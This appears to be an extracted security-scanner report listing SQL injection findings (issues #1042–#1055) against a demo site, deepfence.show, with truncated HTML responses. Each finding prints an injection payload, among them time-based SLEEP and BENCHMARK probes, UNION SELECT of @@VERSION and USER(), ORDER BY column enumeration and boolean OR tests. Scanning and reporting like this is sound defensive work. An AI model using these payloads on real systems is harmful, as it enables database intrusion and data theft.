src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1042\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'&'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1043\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1044\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) \nAND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1045\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1046\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1047\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io OR 3409=3409 AND ('pytW' LIKE 'pytY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1048\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io and (select substring(@@version,1,1))='X'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1049\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io benchmark(50000000,MD5(1))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1050\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io OR 3409=3409 AND ('pytW' LIKE 'pytW\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1051\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1052\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT NULL#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1053\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1054\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1055\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of 